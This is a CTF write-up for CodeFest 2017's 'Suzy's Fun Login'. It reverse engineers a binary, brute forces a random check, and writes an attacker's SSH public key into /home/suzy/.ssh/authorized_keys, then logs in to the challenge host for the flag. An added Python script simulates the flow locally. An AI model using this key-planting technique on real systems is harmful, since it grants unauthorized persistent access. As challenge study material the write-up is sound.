CodeFest CTF 2017 - Suzy's Fun Login Writeup

by andreafioraldi
September 23, 2017

Connecting to the remote service we can see that the response is random:

Screenshot showing random server response

What? It's time to open IDA. The main function is full of rubbish, so we locate the interesting function through the xrefs to the string Do you want to play? (Y/N?): .

This is the decompiled function:

Screenshot of decompiled function checking for sub_40877C() function

We can see that the program's behaviour is conditioned by the procedure sub_40877C, which presumably has a side effect on the variable v7.

Let's analyze it.

Screenshot of sub_40877C() function writing random numbers to array

Ok, it's simple: it writes three random numbers in range(0, 3) into the array passed as an argument.

Returning to the previous function, we see that these three numbers must be, in order, 0 1 2.

We can brute force it.

Screenshot showing brute forcing random numbers to be 012

Now we need to find out the content of the dest variable, the name of the file to which the program will write our bet.

Looking at the global variable src, it is an array of three pointers to the strings /home/suzy, .ssh and authorized_keys.

Screenshot showing src array containing filename components

Ok, now we have all info to solve the challenge.

~/.ssh/authorized_keys is the file in which an SSH server stores the public keys that are allowed to log in, so we must pass an SSH public key as input.

With ssh-keygen -t rsa -b 1024 we generate our key (1024 bits because fgets reads at most 398 bytes).

Now copy the content of the public key (it looks like ssh-rsa AAAA...otherbase64chars... yourusername@localhost.localdomain) and keep submitting it until you get the response You won the lottery, but were you smart enough to make the right bets?.

Congratulations, you have inserted the key on the server.
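The two pieces of reasoning above (the 0 1 2 lottery that has to be brute forced, and the 1024-bit key size chosen so that the public key line fits in the 398 bytes fgets reads) can be checked locally. The following script is an added example, not code from the writeup or from the challenge: it models the binary's logic with a fake service that writes under a temporary directory instead of /home/suzy, brute forces it the way the writeup does, and computes the length of an OpenSSH ssh-rsa public key line from the RFC 4253 wire format to see which key sizes fit. The losing message, the sample key line and the assumption that 398 is the total number of bytes fgets returns are constructed; only the winning message, the src components and the fgets limit come from the writeup.

```python
import os
import random
import tempfile

# Constructed model of the challenge binary's logic for illustration; it is not
# the original program. Values taken from the writeup: the fgets limit of 398
# bytes, the `src` components, and the winning sequence 0 1 2.
FGETS_LIMIT = 398
SRC = ["/home/suzy", ".ssh", "authorized_keys"]
WIN_MSG = "You won the lottery, but were you smart enough to make the right bets?"
LOSE_MSG = "You lost (constructed placeholder; the real message is not in the writeup)"


def draw_bets(rng):
    """Model of sub_40877C: writes three values in range(0, 3) to an array."""
    return [rng.randrange(3) for _ in range(3)]


def bets_win(bets):
    """The caller only proceeds when the array holds 0, 1, 2 in that order."""
    return bets == [0, 1, 2]


def win_probability():
    """Each draw has 3**3 equally likely outcomes and exactly one of them wins."""
    return 1 / 3 ** 3


def openssh_rsa_pubkey_line_length(modulus_bits, comment="", exponent=65537):
    """Length of an `ssh-rsa <base64 blob> [comment]` line.

    The blob follows the RFC 4253 wire format: string "ssh-rsa", mpint e,
    mpint n. An mpint carries a leading 0x00 byte when its high bit is set,
    which is always the case for a modulus of exactly `modulus_bits` bits.
    """
    def mpint_len(bit_length):
        return 4 + (bit_length + 8) // 8           # 4-byte length prefix + magnitude

    blob = (4 + len(b"ssh-rsa")) + mpint_len(exponent.bit_length()) + mpint_len(modulus_bits)
    b64 = -(-blob // 3) * 4                        # base64 pads to a multiple of 4
    line = len("ssh-rsa ") + b64
    if comment:
        line += 1 + len(comment)                   # separating space + comment
    return line


def fits_fgets(modulus_bits, comment="", limit=FGETS_LIMIT):
    """True if the key line plus its newline fits in what fgets will read.

    Assumption: `limit` is the total number of bytes fgets returns, as the
    writeup states it.
    """
    return openssh_rsa_pubkey_line_length(modulus_bits, comment) + 1 <= limit


class FakeSuzyService:
    """Local stand-in for the remote service; writes under `root` instead of /."""

    def __init__(self, root, rng):
        self.rng = rng
        # `dest` is assembled from the three `src` pointers, as in the binary.
        self.dest = os.path.join(root, SRC[0].lstrip("/"), *SRC[1:])

    def play(self, line):
        line = line[:FGETS_LIMIT]                  # model of fgets truncation
        if not bets_win(draw_bets(self.rng)):
            return LOSE_MSG
        os.makedirs(os.path.dirname(self.dest), exist_ok=True)
        with open(self.dest, "a") as fh:
            fh.write(line)
        return WIN_MSG


def brute_force(service, line, max_attempts=100000):
    """Resubmit `line` until the service reports a win; returns the attempt count."""
    for attempt in range(1, max_attempts + 1):
        if service.play(line) == WIN_MSG:
            return attempt
    return None


def demo_run(seed=1):
    """Run the whole flow against the fake service and report what happened."""
    # Constructed sample line, not a real key.
    key_line = "ssh-rsa AAAAB3NzaC1yc2EAAAADAQAB_constructed_sample_ user@localhost.localdomain\n"
    root = tempfile.mkdtemp()
    service = FakeSuzyService(root, random.Random(seed))
    attempts = brute_force(service, key_line)
    with open(service.dest) as fh:
        stored = fh.read()
    return {"attempts": attempts, "stored": stored, "expected": key_line}


if __name__ == "__main__":
    print(demo_run())
```

Running it shows why the writeup can afford a plain retry loop (one win in 27 draws on average) and why 1024 bits was chosen: a 1024-bit key line with the default comment is about 240 bytes, a 2048-bit line with the same comment is already over 398, and a 4096-bit line is over 700 bytes and would be truncated by fgets, leaving a broken entry in authorized_keys.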

Now type in the terminal ssh -i private_key_file suzy@13.126.83.119 (suzy is the remote user that we found hardcoded in the binary).

You are logged in; navigate the filesystem and get your flag.

-> flag{wowyouknowyourexecutables}